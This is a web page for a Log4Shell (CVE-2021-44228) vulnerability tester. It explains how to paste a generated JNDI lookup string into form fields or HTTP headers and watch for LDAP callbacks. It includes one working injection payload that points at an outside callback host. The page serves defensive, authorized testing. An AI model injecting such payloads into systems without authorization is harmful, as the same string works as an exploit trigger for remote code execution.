Huntress Log4Shell Vulnerability Tester

Our team is continuing to investigate CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software. The source code for this tool is available on GitHub at huntresslabs/log4shell-tester.

This site can help you test whether your applications are vulnerable to Log4Shell (CVE-2021-44228). Here's how to use it:

You simply copy and paste the generated JNDI syntax (the code block ${jndi[:]ldap[:]//.... presented below) into anything (application input boxes, frontend site form fields, logins such as username inputs, or if you are bit more technical, even User-Agent or X-Forwarded-For or other customizable HTTP headers).
Check the results page to see if it received any connection, and verify the detected IP address and timestamp, to correlate with when you tested any service.
If you see an entry, a connection was made and the application you tested is vulnerable.

The following payload should only be used with systems which you have explicit permission to test. If you find any vulnerable applications or libraries, you should exercise responsible disclosure to minimize any potential fallout due to the vulnerability! This tool was created with the intention of helping the community quickly identify vulnerable applications in your own networks only.

Please know that a negative test does not guarantee that your application is patched. The tool is designed to offer a simpler means of testing and is intended for testing purposes only—it should only be used on systems you are authorized to test. If you find any vulnerabilities, please follow responsible disclosure guidelines.

Your unique identifier is: 3fa50505-4f9c-467a-9069-9d09343df876. You can use the payload below for testing:

${jndi:ldap://honey.codacloud.net:1389/3fa50505-4f9c-467a-9069-9d09343df876}

View Connections

Technical Details

The tool works by generating a random unique identifier which you can use when testing input fields. If an input field or application is vulnerable, it will reach out to this website over LDAP. Our LDAP server will immediately terminate the connection, and log it for a short time. This tool will not actually run any code on your systems.